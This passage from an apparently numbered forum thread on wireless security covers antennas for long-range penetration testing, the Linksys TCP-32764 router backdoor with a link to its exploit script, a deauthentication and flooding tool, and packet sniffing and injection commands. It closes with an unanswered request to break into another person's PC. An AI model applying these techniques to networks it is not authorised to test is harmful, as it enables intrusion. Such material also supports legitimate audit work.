However, parabolic antennas are highly directional, which means you need to ensure that they are pointed in the right direction, otherwise they might completely “shield” the signal. Because of their high gain, they are suitable for long range point-to-point communications.

Suitability for wardriving: A parabolic antenna would pick up wireless signals from miles away but only from a single direction at a time. Hence, if you want to map Wi-Fi access points in multiple directions while driving, this is not the best choice.

Suitability for penetration testing: Given their long range, parabolic antennas can be very suitable for targeted wireless intrusions, since they allow you to carry out tests from far away once you have positioned them toward target access points.

Yagi Antennas

Yagi antennas, named after Dr. Hidetsugu Yagi, have a central beam with many individual elements supported by this beam [Figure 8]. These elements constitute radiators and reflectors. A variation is the ‘Vagi’ antenna, which is comprised of two beams side by side.

Suitability for wardriving: Yagi antennas are directional, which means they are not the best choice during wardriving. They would pick up far off signals from a particular direction, while missing out on signals in the other directions.

Suitability for penetration testing: Like parabolic antennas, Yagi antennas are capable of picking up signals from miles away. Their high gain (e.g. 25 dBi) makes them ideal for penetration testing when you have them pointed towards the target. The Vagi antenna is an attractive choice for penetration testing since it is small and lightweight, yet offers substantial gains.

Backfire Antennas

Backfire antennas are known to have a small size but a significant gain. This makes them a very attractive choice for point-to-point or point-to-multipoint communications. How do they differ from parabolic antennas? There is no parabola; the reflector surface is flat.
Their resonant cavity structural design makes them capable of achieving the high gain. For suitability toward wardriving and penetration testing, see ‘Parabolic Antennas’.

Building Your Own High Gain Antenna

If you have followed this discussion on antennas so far, building your own antenna can be a fun exercise. For this, you will need:

- About 1-2 inch of 12 gauge copper wire or an omnidirectional antenna
- A smooth metallic parabolic reflector such as aluminum foil, a can, an 8 inch dumpling strainer, etc.

How to Make a Cantenna

Cantennas, antennas made out of cans, have been very popular among enthusiasts since they are easy to make and everything you need is in your home. The idea is to use a ‘Pringles’ or similar can, and introduce a copper wire near the bottom from the side of the can [Figure 9]. Calculations regarding the placement of the copper wire need to be precise. You can use this calculator to ensure accuracy. However, if the can is very narrow, you would need to point this antenna very precisely towards the signal direction and even then you would not notice significant gain. Moreover, if you are using a long cable, signals would suffer attenuation.

Note: Although a Pringles can is often mentioned, it is not a good can to be used for these purposes since it is too narrow. In fact, any cantenna is a bad choice for serious penetration testing.

How to Make a Parabolic Antenna

If you have an omnidirectional antenna available [Figure 6], the task becomes easier. Now, all you need to do is find a parabolic reflector that can “turn” this omnidirectional antenna into a parabolic antenna. This parabolic reflector can be any smooth metallic surface that can converge radio signals over the omnidirectional antenna—and this is what improves the antenna gain [Figure 10].

Accurate placement of the omnidirectional antenna in front of the parabolic reflector is of prime significance.
There is no increase in antenna gain if an inexperienced person has placed the omnidirectional antenna too far from or too close to the parabolic reflector so that it completely misses the focal point. Hence, for accuracy, use this parabolic antenna focal point calculator.

Alternatively, if you prefer to avoid making calculations, you can use freely available parabolic reflector templates which have been drawn to scale. These templates explicitly mark the focal point of the parabolic reflector so that you do not have to make calculations. For instance, you can print and use the parabolic reflector template in Figure 11.

You would need a square sheet of reflective material that you can place vertically on the straight line drawn in this template, and bend the sheet until it matches the parabolic curve in the template. Notice the marked focal point (black spot) in the template; place the omnidirectional antenna at that point.

Note: We have discussed making parabolic reflectors; however, if you want to build a 2.4 GHz omnidirectional antenna from scratch, it can get quite convoluted. You can follow this link to build such an omnidirectional antenna.

Comparison to Commercial Antennas

These homemade antennas are capable of giving you results as good as commercial antennas. However, you need to be accurate while building these. Imprecise measurements, design flaws, or implementation errors would result in inefficient antennas with no significant gain.

Turning Your Laptop’s Internal Antenna to an External Antenna

In case you have some 5 or 7 dBi antennas from your old wireless router lying around [Figure 6], and you want to avoid purchasing a USB antenna unit, you can attach these to your laptop’s built-in internal antenna unit.
For this, you will need:

- U.FL male to RP-SMA pigtail cable
- Knowledge of laptop disassembly and assembly, and relevant tools
- Any 2.4 GHz antenna [Figure 6]

You would need to disassemble your laptop using the required tools and locate the auxiliary antenna connector on the motherboard [Figure 12]. The U.FL side of the cable would fit into this auxiliary connector, and the other side should be fixed along the laptop’s edges such that you can attach your 2.4 GHz external antenna to this SMA (SubMiniature version A) end.

Detriments to Wireless Signals

Even with the right type of antenna, you may experience weak connections characterized by frequent packet drops and delays. In these situations, one or more of these factors may be the cause:

Distance: The most obvious reason is that you are too far from the transmitter. Signals get attenuated over long distances, especially when omnidirectional transmitters are being used, such as those used by common wireless routers.

Weather: If an efficient transmitting antenna is being used at the right frequency, weather would have little effect on wireless signals. However, rain can absorb radio signals and enervate Wi-Fi signals at 2.4 GHz.

Objects in path: Signals at 2.4 GHz frequency need a clear ‘line-of-sight’ for efficient propagation. This means that trees and walls act as obstructions to the wireless signal.

Other access points: If there are other APs in the vicinity that are working on the same channel in crowded areas, this would cause substantial disturbance.

Conclusion

Wardriving is not illegal as long as you are aware of your limits and avoid nefarious activities such as cracking encryption, retrieving access point passwords, and accessing the Internet for free—known as Piggybacking. For wardriving, you can use a 7 dBi omnidirectional antenna placed on top of your vehicle using a magnetic mount.
For wireless penetration testing scenarios in which you want to breach the security of a particular establishment, it is best to use parabolic reflectors pointed towards the target. Depending on the conditions, these parabolic antennas would allow you to carry out wireless penetration tests from a long distance, which would lower the risk of being noticed by security personnel. Furthermore, using high gain directional antennas, you are able to ascertain how close to the target perimeter potential attackers would need to be in order to intrude on wireless communications. A 5 or 7 dBi omnidirectional antenna can be used while testing premises for the presence of rogue access points.

References

[1] M. Erskine. (2002-2003) www.freeantennas.com. [Online]. Parabolic Templat
[2] Tim Pozar. Late Night Software. [Online]. Slide 1
[3] R. Dean Straw, L. B. Cebik, and Dave Hallidy, Eds., ARRL Antenna Book, 22nd ed.: The American Radio Relay League, Inc., October 2011.
[4] Frank Thornton and Russ Rogers, “Understanding Antennas and Antenna Theory,” in WarDriving and Wireless Penetration Testing: Syngress, 2007, ch. 2, pp. 31-59.

Source
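An added example, not from the original article: a free-space link budget that combines the dBm bands and antenna gains discussed above to estimate how far from your own access point a receiver with a given antenna could still hold a signal, which is the perimeter question the conclusion raises. The 20 dBm transmit power, 2 dBi access-point antenna and channel-6 frequency are assumed values, and free space ignores walls and trees, so the result is an upper bound.

```python
import math

# Signal-level bands quoted in the article, strongest first (floor in dBm).
BANDS = [
    (-67, "timely delivery (VoIP, video)"),
    (-70, "reliable delivery (web surfing)"),
    (-80, "basic connection, some drops"),
    (-90, "barely connected"),
]


def dbm_to_mw(dbm):
    """Convert dBm to milliwatts: 0 dBm is 1 mW (0.001 W), as the article says."""
    return 10 ** (dbm / 10.0)


def classify(dbm):
    """Map a received level onto the article's bands."""
    for floor, label in BANDS:
        if dbm >= floor:
            return label
    return "no usable signal"


def fspl_db(distance_m, freq_mhz):
    """Free-space path loss in dB for a distance in metres and frequency in MHz."""
    if distance_m <= 0:
        raise ValueError("distance must be positive")
    return 20 * math.log10(distance_m / 1000.0) + 20 * math.log10(freq_mhz) + 32.44


def received_dbm(tx_dbm, tx_gain_dbi, rx_gain_dbi, distance_m,
                 freq_mhz=2437.0, obstruction_db=0.0):
    """Received level: transmit power plus both antenna gains minus all losses."""
    return (tx_dbm + tx_gain_dbi + rx_gain_dbi
            - fspl_db(distance_m, freq_mhz) - obstruction_db)


def max_range_m(tx_dbm, tx_gain_dbi, rx_gain_dbi, threshold_dbm,
                freq_mhz=2437.0, obstruction_db=0.0):
    """Distance at which the received level falls to threshold_dbm."""
    allowed_loss = tx_dbm + tx_gain_dbi + rx_gain_dbi - obstruction_db - threshold_dbm
    exponent = (allowed_loss - 20 * math.log10(freq_mhz) - 32.44) / 20.0
    return (10 ** exponent) * 1000.0


def exposure_table(rx_gains_dbi, threshold_dbm=-80.0, tx_dbm=20.0,
                   tx_gain_dbi=2.0, freq_mhz=2437.0, obstruction_db=0.0):
    """Range in metres per receiver antenna gain, for one access point."""
    return {
        gain: max_range_m(tx_dbm, tx_gain_dbi, gain, threshold_dbm,
                          freq_mhz, obstruction_db)
        for gain in rx_gains_dbi
    }


if __name__ == "__main__":
    # Gains mentioned in the article: 2, 5, 7, 9 dBi omni and a 25 dBi Yagi.
    for label, loss in (("free space", 0.0), ("assumed 20 dB of walls", 20.0)):
        print(label)
        for gain, metres in exposure_table([2, 5, 7, 9, 25], obstruction_db=loss).items():
            print(f"  {gain:>2} dBi receiver: -80 dBm reached at about {metres:8.0f} m")
```

Every 20 dB of extra gain multiplies the free-space range by ten, and every 20 dB of obstruction divides it by ten, which is why the same access point can be out of reach for a laptop's internal antenna and still receivable with a directional one.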
  15. In a blog post, Eloi said that during the Christmas holidays he forgot the admin interface password of his Linksys WAG200G router, and in an effort to regain access to its administration panel, he first scanned the router and found a suspicious open TCP port, 32764.

To do further research on this port's service, he downloaded a copy of the Linksys firmware and reverse-engineered it. What he found was a secret backdoor interface that allowed him to send commands to the router from a command-line shell without being authenticated as the administrator.

Then he tried to brute-force the login available at that port, but doing so flips the router's configuration back to factory settings, with the default router administration username and password.

'The backdoor requires that the attacker be on the local network, so this isn’t something that could be used to remotely attack DSL users. However, it could be used to commandeer a wireless access point and allow an attacker to get unfettered access to local network resources.'

He described the complete details of this serious vulnerability in the above slides. After his post, other hackers around the world did further research, which shows that these devices are made by Sercomm, meaning that Cisco, Watchguard, Belkin and various others may be affected as well.

Source: Hacking Wireless DSL routers via Administrative password Reset Vulnerability

The Python-based exploit script can be downloaded from here: https://github.com/elvanderb/TCP-32764

The complete list of vulnerable devices can be found here: https://github.com/elvanderb/TCP-32764/blob/master/README.md
  16. hwk is an easy-to-use wireless authentication and de-authentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types.

README

DATE
8/03/2013

AUTHOR
atzeton - http://www.nullsecurity.net/

LICENSE
GNU GPLv2, see COPYING

What is hwk?
===============
hwk is a collection of packet crafting/network flooding tools:

- hawk for flooding the air with preconfigured or non-interactively gained information
- eagle for RADIOTAP WLAN MGT and LLC header packet crafting. It also supports appending random 'payload'

WARNING: This is a BETA release since it hasn't been tested sufficiently.

Dependencies:
=============
- libpcap

How to install?
===============
make
(as root) make install
make clean

INFO: CAP_NET_RAW, CAP_NET_ADMIN, CAP_SYS_ADMIN (ioctls) capabilities are automatically set during installation.

Usage
=====
See --help or the man files of hawk/eagle!

Bugs
=====
If you find any bugs, feel free to drop me a line!

Stay tuned
==========
* http://nullsecurity.net/

Download: HWK Wireless Auditing Tool 0.4 (Packet Storm)
  17. Packet Sniffing and Injecting

WLAN frames:

Management frames: Management frames are responsible for maintaining communication between access points and wireless clients.
Control frames: Control frames are responsible for maintaining a proper exchange of data between the access point and wireless clients.
Data frames: They carry the actual data sent over the wireless network. There are no sub-types for data frames.

Packet Sniffing using Wireshark

Open Wireshark from the menu, or type "wireshark" in the console. In the menu you can find it under Application>BackTrack>Information Gathering>Network Analysis>Network Traffic Analysis>wireshark

Once Wireshark has opened, click "Interface List". Another window will open with a list of interfaces that can capture packets.

Note: I set mine to mon0.

Click Start, and Wireshark will begin capturing packets. Those are the wireless packets that the wireless card is sniffing (I couldn't find another word).

Now let's scan the packets from our own access point. To do this, we will use airodump-ng. Airodump-ng is used to capture wireless packets that use WEP encryption, with the idea that you will then use aircrack-ng (I will use it in a tutorial on another occasion). But this time, let's disable encryption on our access point. Now go to the terminal and type:

    airodump-ng --bssid 00:D9:98:6A:85:b0 mon0

Note: 00:D9:98:6A:85:b0 is the MAC address of my access point. To find yours, in the terminal:

    ifconfig -a

After airodump-ng finishes, you will see your access point with the channel it runs on. Now we need to lock onto our access point by setting the wireless card to the access point's channel. For this:

    root@bt:~# iwconfig mon0 channel 6

(where "6" is the access point's channel). Now let's go back to Wireshark. Type in the filter box:

    (wlan.bssid == YOUR MAC ADDRESS) && (wlan.fc.type_subtype == 0x20)

Now we will sniff only the packets from our access point.

Packet Injecting

First, we want to see only the non-beacon packets in Wireshark. So open Wireshark and type in the filter box:

    (wlan.bssid == YOUR MAC ADDRESS) && !(wlan.fc.type_subtype == 0x08)

Then open the terminal and type:

    aireplay-ng -9 -e "Wubi" -a YOUR MAC ADDRESS mon0

Note: Replace Wubi with the name of your SSID.

Now, if you go back to Wireshark, you should see a few packets that were injected. Those are just random packets that have no real effect.

References
Main Page - BackTrack Linux
Backtrack Tutorials
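What the two Wireshark display filters in the post above test, as an added example that is not part of the original post: a parser for the 802.11 frame control field that derives the `type_subtype` value and the BSSID of each frame. The frames are constructed samples with the radiotap header assumed already stripped; the first BSSID is the one quoted in the post and the second is made up.

```python
TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
BEACON = 0x08  # type 0 (management), subtype 8
DATA = 0x20    # type 2 (data), subtype 0


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_header(frame):
    """Decode type, subtype and BSSID from the start of an 802.11 frame."""
    if len(frame) < 10:
        raise ValueError("frame shorter than the minimal 802.11 header")
    ftype = (frame[0] >> 2) & 0x3      # bits 2-3 of the first byte
    subtype = (frame[0] >> 4) & 0xF    # bits 4-7 of the first byte
    to_ds = frame[1] & 0x01
    from_ds = (frame[1] >> 1) & 0x01
    bssid = None
    if ftype in (0, 2) and len(frame) >= 24:
        addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
        if ftype == 0 or (to_ds, from_ds) == (0, 0):
            bssid = addr3
        elif (to_ds, from_ds) == (1, 0):   # station -> AP
            bssid = addr1
        elif (to_ds, from_ds) == (0, 1):   # AP -> station
            bssid = addr2
        # to_ds = from_ds = 1 is a four-address frame with no single BSSID
    return {
        "type": TYPE_NAMES.get(ftype, "other"),
        # Same packing as the wlan.fc.type_subtype field: type in the high nibble.
        "type_subtype": (ftype << 4) | subtype,
        "bssid": mac_text(bssid) if bssid else None,
    }


def matches(frame, bssid, only=None, exclude=None):
    """Mirror '(wlan.bssid == X) && (type_subtype == only)' or '&& !(== exclude)'."""
    hdr = parse_header(frame)
    if hdr["bssid"] != bssid.lower():
        return False  # also drops control frames, which carry no BSSID here
    if only is not None and hdr["type_subtype"] != only:
        return False
    if exclude is not None and hdr["type_subtype"] == exclude:
        return False
    return True


def build(fc0, fc1, addr1, addr2=None, addr3=None):
    """Assemble a constructed header: frame control, duration, addresses, sequence."""
    hdr = bytes([fc0, fc1, 0, 0]) + addr1
    if addr2 is not None:
        hdr += addr2 + addr3 + b"\x00\x00"
    return hdr


MY_AP = "00:d9:98:6a:85:b0"      # BSSID quoted in the post
OTHER_AP = "02:00:00:00:00:01"   # constructed neighbour
STATION = mac_bytes("02:00:00:00:00:aa")  # constructed client
BCAST = b"\xff" * 6
AP, OTHER = mac_bytes(MY_AP), mac_bytes(OTHER_AP)

SAMPLES = [
    build(0x80, 0x00, BCAST, AP, AP),        # beacon from our AP
    build(0x08, 0x02, STATION, AP, AP),      # data, AP -> station (FromDS)
    build(0x08, 0x01, AP, STATION, BCAST),   # data, station -> AP (ToDS)
    build(0x80, 0x00, BCAST, OTHER, OTHER),  # beacon from the neighbour
    build(0xD4, 0x00, STATION),              # ACK control frame (10 bytes)
]


def count(only=None, exclude=None):
    return sum(matches(f, MY_AP, only=only, exclude=exclude) for f in SAMPLES)


if __name__ == "__main__":
    for frame in SAMPLES:
        print(parse_header(frame))
    print("data frames for our BSSID:", count(only=DATA))
    print("non-beacon frames for our BSSID:", count(exclude=BEACON))
```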
  18. Short introduction: Starting from Nytro's idea of posting a tutorial about an access point on BackTrack, I thought it would be OK to share a tutorial I made 9-10 months ago. Since I like more complicated things and wanted something very stable, I built the AP on FreeBSD.
--
Fed up with the little magic boxes used for wireless / routing (Netgear, D-Link), I decided to build an AP on one of the FreeBSD “servers” I use at home for work. Drawbacks of the boxes: they froze frequently and were unstable.

Notes:
- Wireless card used: Linksys WMP54G. (It is detected as Ralink Technology, Corp)
- The tutorial does not include configuring wireless protection; I will make a separate tutorial for that. (Update: Done.)
- I tested the wireless from a netbook; the screenshot can be seen here.
- On the netbook, I configured the IP address manually; if you want it assigned automatically, you can install DHCPD.
- The NAT in the firewall is done to 10.0.0.12 (the IP address of the external network card – I did not specify NAT to the interface because there is IPv6 as well)
- The FreeBSD used is 8.2 Release.

tex ~ # pciconf -lv
....................................
ral0@pci0:1:0:0: card=0x00551737 chip=0x03011814 rev=0x00 hdr=0x00
    vendor = 'Ralink Technology, Corp.'
    device = 'Edimax 54 MBit WLan 802.11g rt 2500 (b8341462)'
    class = network
tex ~ # ifconfig ral0
ral0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 2290
    ether 00:16:b6:5d:73:05
    media: IEEE 802.11 Wireless Ethernet autoselect (autoselect)
    status: no carrier
tex ~ # dmesg |grep ral
ral0: <Ralink Technology RT2561S> mem 0xfbef8000-0xfbefffff irq 17 at device 0.0 on pci1
ral0: MAC/BBP RT2661B, RF RT2527
ral0: [ITHREAD]
ppc0: <Parallel port> port 0x378-0x37f irq 7 on acpi0
ppbus0: <Parallel port bus> on ppc0
ppi0: <Parallel I/O> on ppbus0
tex ~ # ifconfig wlan1 create wlandev ral0 wlanmode hostap
tex ~ # ifconfig wlan1 up scan
SSID/MESH ID    BSSID              CHAN RATE  S:N     INT CAPS
FRITZ!Box o...  00:24:fe:ac:7b:35  1    54M   -93:-95 100 EPS RSN WPA WME HTCAP ATH WPS
LINUX SECUR...  00:1b:2f:f6:d5:12  11   54M   -83:-95 100 EPS RSN WPA WME
tex ~ #
tex ~ # ifconfig wlan1 192.168.0.1 netmask 255.255.255.0 ssid RTFM channel 11
tex ~ # ifconfig wlan1
wlan1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
    ether 00:16:b6:5d:73:05
    inet6 fe80::216:b6ff:fe5d:7305%wlan1 prefixlen 64 scopeid 0x7
    inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.0.255
    nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
    media: IEEE 802.11 Wireless Ethernet autoselect mode 11g <hostap>
    status: running
    ssid RTFM channel 11 (2437 MHz 11g) bssid 00:16:b6:5d:73:05
    country US authmode OPEN privacy OFF txpower 0 scanvalid 60
    protmode CTS dtimperiod 1 -dfs
tex ~ # pico /etc/rc.conf
............
wlans_ral0="wlan1"
create_args_wlan1="wlanmode hostap mode 11g"
ifconfig_wlan1="inet 192.168.0.1 netmask 0xffffff00 ssid RTFM channel 11"
............
tex ~ # pico /etc/pf.conf
............
nat from 192.168.0.0/24 to any -> 10.0.0.12
............
tex ~ # /etc/rc.d/pf reload
Reloading pf rules.
tex ~ # sysctl net.inet.ip.forwarding=1
net.inet.ip.forwarding: 0 -> 1
tex ~ # echo 'net.inet.ip.forwarding=1' >> /etc/sysctl.conf
tex ~ # ifconfig -m wlan1
wlan1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
    ether 00:16:b6:5d:73:05
    inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.0.255
    inet6 fe80::216:b6ff:fe5d:7305%wlan1 prefixlen 64 scopeid 0x7
    nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
    media: IEEE 802.11 Wireless Ethernet autoselect mode 11g <hostap>
    status: running
    supported media:
        media OFDM/54Mbps mode autoselect mediaopt hostap
        media OFDM/48Mbps mode autoselect mediaopt hostap
        media OFDM/36Mbps mode autoselect mediaopt hostap
        media OFDM/24Mbps mode autoselect mediaopt hostap
        media OFDM/18Mbps mode autoselect mediaopt hostap
        media OFDM/12Mbps mode autoselect mediaopt hostap
        media OFDM/9Mbps mode autoselect mediaopt hostap
        media OFDM/6Mbps mode autoselect mediaopt hostap
        media DS/11Mbps mode autoselect mediaopt hostap
        media DS/5.5Mbps mode autoselect mediaopt hostap
        media DS/2Mbps mode autoselect mediaopt hostap
        media DS/1Mbps mode autoselect mediaopt hostap
        media OFDM/54Mbps mode 11g mediaopt hostap
        media OFDM/48Mbps mode 11g mediaopt hostap
        media OFDM/36Mbps mode 11g mediaopt hostap
        media OFDM/24Mbps mode 11g mediaopt hostap
        media OFDM/18Mbps mode 11g mediaopt hostap
        media OFDM/12Mbps mode 11g mediaopt hostap
        media OFDM/9Mbps mode 11g mediaopt hostap
        media OFDM/6Mbps mode 11g mediaopt hostap
        media DS/11Mbps mode 11g mediaopt hostap
        media DS/5.5Mbps mode 11g mediaopt hostap
        media DS/2Mbps mode 11g mediaopt hostap
        media DS/1Mbps mode 11g mediaopt hostap
        media autoselect mode 11g mediaopt hostap
        media DS/11Mbps mode 11b mediaopt hostap
        media DS/5.5Mbps mode 11b mediaopt hostap
        media DS/2Mbps mode 11b mediaopt hostap
        media DS/1Mbps mode 11b mediaopt hostap
        media autoselect mode 11b mediaopt hostap
        media autoselect mode autoselect mediaopt hostap
    ssid RTFM channel 11 (2462 MHz 11g) bssid 00:16:b6:5d:73:05
    country US authmode OPEN privacy OFF txpower 0 scanvalid 60
    protmode CTS dtimperiod 1 -dfs
tex ~ #

Other notes:
- If you want to build a toy like this and don't understand something, I can help you.
- I will include one more howto in this thread, for protecting the AP.
  19. Ubertooth is an open source 2.4 GHz wireless development platform suitable for passive Bluetooth monitoring. It aims to be the world’s first open source and affordable Bluetooth monitoring and development platform. Open source hardware and software. Download Ubertooth from SourceForge.net [r434]
  20. Hi, can you tell me how I can get into the PC of a person who has a router or wireless connected to the PC and the printer and sharing function enabled? How can I connect through wireless to his PC and have access to the whole PC?